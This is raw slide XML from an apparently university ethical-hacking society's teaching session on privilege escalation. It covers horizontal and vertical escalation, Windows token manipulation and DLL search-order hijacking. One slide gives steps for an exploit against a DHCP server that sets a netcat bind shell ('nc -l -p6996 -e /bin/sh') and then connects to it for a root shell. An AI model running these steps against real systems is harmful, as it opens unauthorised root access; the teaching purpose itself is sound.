              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>set CMD /bin/nc -l -p6996 -e /bin/sh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> this will bind and listen to port 6996 in your DHCP server </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Set NETMASK what is netmask write it later</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>set NETMASK 255.255.255.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Result  you set up a netcat listener with root privileges on port 6996 piping out a BASH shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>In your command prompt, run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>c::\nc </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>your_DHCP_server_IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> 6996</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>You can check by running </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>ifconfig </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> whoami</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1500" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="de-DE" sz="1500" dirty="0">
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="394800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65500" y="238625"/>
            <a:ext cx="4115700" cy="247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Upcoming Sessions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95" name="Google Shape;95;p1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What’s up next?</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.shefesh.com/sessions</a:t>
            </a:r>
            <a:endParaRPr sz="1900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="EB3C68"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96" name="Google Shape;96;p1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30</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Nov – OSINT</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Dec – Hack the Box</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>14</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Dec – Xmas Session</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Any Questions?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="Google Shape;102;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2740350" y="4208475"/>
            <a:ext cx="3663300" cy="57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300">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>www.shefesh.com</a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:solidFill>
                <a:srgbClr val="EB3C68"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Thanks for coming!</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="103" name="Google Shape;103;p19"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3225075" y="1285325"/>
            <a:ext cx="2693850" cy="26996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dirty="0"/>
              <a:t>Before proceeding past this point you must read and agree to our Code of Conduct - this is a requirement from the University for us to operate as a society. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" dirty="0"/>
            </a:br>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>If you have any doubts or need anything clarified, please ask a member of the committee.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" dirty="0"/>
            </a:br>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Breaching the Code of Conduct = immediate ejection and further consequences.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" dirty="0"/>
            </a:br>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Code of Conduct can be found at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://shefesh.com/downloads/SESH%20Code%20of%20Conduct.pdf</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="Google Shape;69;p14"/>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Code of Conduct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Privilege Escalation</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1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>Privilege escalation is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>the act of exploiting a bug, design flaw or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="à"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Users that aren’t permitted to have rights they are not supposed to have, such as deleting, editing files, view hidden information, or install programs </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Why would someone perform privilege escalation?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>Read/Write sensitive files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>Persist easily between reboots</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>Insert a permanent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>bacdoor</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t> Check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://attack.mitre.org/tactics/TA0004/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t> for lists of privilege escalation techniques.</a:t>
            </a:r>
            <a:endParaRPr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rgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Horizontal Privilege Escalation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attackers gain access directly to an account they intend to perform actions with</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Easier to pull off as you don’t have to elevate permissions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be done with phishing via emails, messages etc.</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="88" name="Google Shape;8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ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vertical Privilege Escalation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Attackers gain access to an account and elevate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>the permissions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Requires more understanding of vulnerabilities and hacking tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Phishing can be used as the first step to gain access to the accounts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Elevating the permission can be done with getting root access or using hacking tools</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89" name="Google Shape;89;p17"/>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ko-KR" dirty="0"/>
              <a:t>Types of Privilege Escalation</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="902195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43435" y="95700"/>
            <a:ext cx="8875059" cy="576000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Access Token Manipulation</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
            </a:b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500" dirty="0"/>
              <a:t>fooling the system into believing that the running process belongs to someone other than the user who started the process, granting the process the permissions of the other user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>Duplicating an access token</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>Creating a new process with an impersonated token</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>Leveraging username and password to create a token</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="167554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43435" y="95700"/>
            <a:ext cx="8875059" cy="576000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DLL Search Order Hijacking</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
            </a:b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34544"/>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500" dirty="0"/>
              <a:t>Attackers can perform “DLL preloading”, which is planting a malicious DLL with the same name as a legitimate DLL and it searched/found before the legitimate one. The system finds the DLL in the working folder and confuses it as a legitimate DLL and executes it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
